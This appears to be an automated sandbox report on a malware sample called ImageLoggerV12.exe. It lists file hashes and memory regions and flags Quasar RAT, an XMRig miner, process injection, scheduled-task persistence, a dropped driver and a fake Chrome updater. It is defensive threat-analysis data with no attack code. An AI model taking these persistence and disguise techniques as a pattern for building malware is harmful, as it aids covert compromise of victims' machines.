C:\Users\Admin\AppData\Local\Temp\_MEI52442\_lzma.pyd
| MD5 | 3798175fd77eded46a8af6b03c5e5f6d |
| SHA1 | f637eaf42080dcc620642400571473a3fdf9174f |
| SHA256 | 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41 |
| SHA512 | 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf |
memory/324-104-0x0000000000400000-0x0000000000724000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/6044-122-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6044-127-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\select.pyd
| MD5 | 90fea71c9828751e36c00168b9ba4b2b |
| SHA1 | 15b506df7d02612e3ba49f816757ad0c141e9dc1 |
| SHA256 | 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d |
| SHA512 | e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\select.pyd
| MD5 | 90fea71c9828751e36c00168b9ba4b2b |
| SHA1 | 15b506df7d02612e3ba49f816757ad0c141e9dc1 |
| SHA256 | 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d |
| SHA512 | e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_socket.pyd
| MD5 | bcc3e26a18d59d76fd6cf7cd64e9e14d |
| SHA1 | b85e4e7d300dbeec942cb44e4a38f2c6314d3166 |
| SHA256 | 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98 |
| SHA512 | 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_socket.pyd
| MD5 | bcc3e26a18d59d76fd6cf7cd64e9e14d |
| SHA1 | b85e4e7d300dbeec942cb44e4a38f2c6314d3166 |
| SHA256 | 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98 |
| SHA512 | 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_ssl.pyd
| MD5 | 2089768e25606262921e4424a590ff05 |
| SHA1 | bc94a8ff462547ab48c2fbf705673a1552545b76 |
| SHA256 | 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca |
| SHA512 | 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_ssl.pyd
| MD5 | 2089768e25606262921e4424a590ff05 |
| SHA1 | bc94a8ff462547ab48c2fbf705673a1552545b76 |
| SHA256 | 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca |
| SHA512 | 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libssl-1_1.dll
| MD5 | 8e8a145e122a593af7d6cde06d2bb89f |
| SHA1 | b0e7d78bb78108d407239e9f1b376e0c8c295175 |
| SHA256 | a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1 |
| SHA512 | d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libssl-1_1.dll
| MD5 | 8e8a145e122a593af7d6cde06d2bb89f |
| SHA1 | b0e7d78bb78108d407239e9f1b376e0c8c295175 |
| SHA256 | a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1 |
| SHA512 | d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4 |
memory/2988-133-0x00000000752C0000-0x0000000075A70000-memory.dmp
memory/324-136-0x000000001B5B0000-0x000000001B5C0000-memory.dmp
memory/2636-137-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-138-0x00007FF8AB380000-0x00007FF8AB38D000-memory.dmp
memory/2636-139-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
memory/2988-142-0x0000000000C40000-0x0000000000CB6000-memory.dmp
memory/6044-143-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
memory/6044-144-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
memory/2636-146-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2988-147-0x0000000005D30000-0x00000000062D4000-memory.dmp
memory/2636-145-0x00007FF898920000-0x00007FF898A97000-memory.dmp
memory/2988-148-0x0000000005780000-0x0000000005812000-memory.dmp
memory/2636-141-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-140-0x00000181DE650000-0x00000181DE9C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
memory/6044-149-0x000001BBF0B30000-0x000001BBF0C7E000-memory.dmp
memory/2636-152-0x00007FF896340000-0x00007FF896929000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_queue.pyd
| MD5 | decdabaca104520549b0f66c136a9dc1 |
| SHA1 | 423e6f3100013e5a2c97e65e94834b1b18770a87 |
| SHA256 | 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84 |
| SHA512 | d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_queue.pyd
| MD5 | decdabaca104520549b0f66c136a9dc1 |
| SHA1 | 423e6f3100013e5a2c97e65e94834b1b18770a87 |
| SHA256 | 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84 |
| SHA512 | d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_hashlib.pyd
| MD5 | f10d896ed25751ead72d8b03e404ea36 |
| SHA1 | eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb |
| SHA256 | 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3 |
| SHA512 | 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_hashlib.pyd
| MD5 | f10d896ed25751ead72d8b03e404ea36 |
| SHA1 | eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb |
| SHA256 | 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3 |
| SHA512 | 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42 |
memory/2636-155-0x00007FF89D440000-0x00007FF89D463000-memory.dmp
memory/2988-160-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/2636-162-0x00007FF89C310000-0x00007FF89C333000-memory.dmp
memory/2636-164-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-166-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2636-167-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\unicodedata.pyd
| MD5 | c2556dc74aea61b0bd9bd15e9cd7b0d6 |
| SHA1 | 05eff76e393bfb77958614ff08229b6b770a1750 |
| SHA256 | 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d |
| SHA512 | f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b |
memory/2636-168-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-169-0x00007FF89B920000-0x00007FF89B934000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\unicodedata.pyd
| MD5 | c2556dc74aea61b0bd9bd15e9cd7b0d6 |
| SHA1 | 05eff76e393bfb77958614ff08229b6b770a1750 |
| SHA256 | 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d |
| SHA512 | f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b |
memory/5144-170-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/2988-172-0x0000000005770000-0x0000000005780000-memory.dmp
memory/2636-173-0x00007FF8A7F10000-0x00007FF8A7F1D000-memory.dmp
memory/2636-174-0x00007FF8973E0000-0x00007FF8974FC000-memory.dmp
memory/6028-184-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6028-185-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6028-186-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6024-197-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/6024-198-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/2636-199-0x00007FF896340000-0x00007FF896929000-memory.dmp
memory/2988-200-0x0000000005770000-0x0000000005780000-memory.dmp
memory/6028-201-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6024-202-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/6024-196-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/2636-208-0x00007FF89C340000-0x00007FF89C36D000-memory.dmp
memory/2636-210-0x00007FF89D840000-0x00007FF89D859000-memory.dmp
memory/2636-211-0x00007FF89C310000-0x00007FF89C333000-memory.dmp
memory/6044-209-0x000001BBF0B30000-0x000001BBF0C7E000-memory.dmp
memory/2636-205-0x00007FF8ACA00000-0x00007FF8ACA0F000-memory.dmp
memory/2636-204-0x00007FF89D440000-0x00007FF89D463000-memory.dmp
memory/2636-203-0x00007FF896340000-0x00007FF896929000-memory.dmp
memory/6044-212-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/2636-214-0x00007FF898920000-0x00007FF898A97000-memory.dmp
memory/2636-216-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-218-0x00007FF8AB380000-0x00007FF8AB38D000-memory.dmp
memory/2636-220-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2636-221-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
memory/2636-223-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-225-0x00007FF89B920000-0x00007FF89B934000-memory.dmp
memory/2636-227-0x00007FF8A7F10000-0x00007FF8A7F1D000-memory.dmp
memory/2636-229-0x00007FF8973E0000-0x00007FF8974FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\blank.aes
| MD5 | 07b71b817dd774c5f88c5526790fcbc9 |
| SHA1 | 6000351cb67edf2275b1b499e0fb01bbe693b1f2 |
| SHA256 | 8f0927d471642856553a04b32a6527b9deebdfcaadc5b0b6f91cf7fc5cb66038 |
| SHA512 | 295fa6d16b15a7b425ec4031f05e34ec159ca0129a5a59ca8b0c6fd146d809fc9834e1eccb8f1aa3ffb8b87bc9ba63bb6688b596b22b92e03f053297e16a6b0d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/5144-233-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/6028-239-0x0000010FDA5B0000-0x0000010FDA6FE000-memory.dmp
memory/6024-240-0x00000250D5E80000-0x00000250D5FCE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9611cc3fb39fedd4b0e81d90b044531c |
| SHA1 | e35c10c1c1e29d44222114e0f72d58b3072880fd |
| SHA256 | 2090eae25be03e07ff54e5ab9d219902fb80e8c1f6fe52e73c9a4afcf5eec5ec |
| SHA512 | 92cf8fdd0353dd1e04856b6642483ac426ea32113a0b7436cf8224623912ae2f31078c7e70cef1c67f859504bd29e05f9af69f06533725e57244063e89e4954d |
memory/1216-254-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/1216-252-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/1216-253-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/1216-255-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/6028-258-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/1216-261-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/6028-263-0x0000010FDA5B0000-0x0000010FDA6FE000-memory.dmp
memory/1216-268-0x000001BC76AC0000-0x000001BC76C0E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5cfe303e798d1cc6c1dab341e7265c15 |
| SHA1 | cd2834e05191a24e28a100f3f8114d5a7708dc7c |
| SHA256 | c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab |
| SHA512 | ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e |
memory/1216-269-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/324-270-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/3768-271-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/3768-272-0x0000021827CB0000-0x0000021827CC0000-memory.dmp
memory/2988-273-0x00000000752C0000-0x0000000075A70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5cfe303e798d1cc6c1dab341e7265c15 |
| SHA1 | cd2834e05191a24e28a100f3f8114d5a7708dc7c |
| SHA256 | c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab |
| SHA512 | ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e |
memory/324-284-0x000000001B5B0000-0x000000001B5C0000-memory.dmp
memory/6028-265-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6024-262-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/6024-257-0x00000250D5E80000-0x00000250D5FCE000-memory.dmp
memory/5144-285-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/3768-286-0x0000021840450000-0x000002184059E000-memory.dmp
memory/3768-288-0x0000021840450000-0x000002184059E000-memory.dmp
memory/3768-293-0x0000021840450000-0x000002184059E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/5144-298-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
memory/4988-310-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/4988-337-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/5644-346-0x00000240BD0F0000-0x00000240BD23E000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b42c70c1dbf0d1d477ec86902db9e986 |
| SHA1 | 1d1c0a670748b3d10bee8272e5d67a4fabefd31f |
| SHA256 | 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a |
| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
memory/2508-375-0x0000029AF7250000-0x0000029AF739E000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/4340-382-0x000002E6FED50000-0x000002E6FED70000-memory.dmp
memory/4988-381-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/5188-383-0x00007FF70F980000-0x00007FF70F9AA000-memory.dmp
memory/4340-384-0x00007FF632C30000-0x00007FF63341F000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-10 03:56
Reported
2023-09-10 04:02
Platform
win7-20230831-en
Max time kernel
151s
Max time network
166s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GC.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1996 set thread context of 1524 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 1996 set thread context of 1896 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7056e7609be3d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
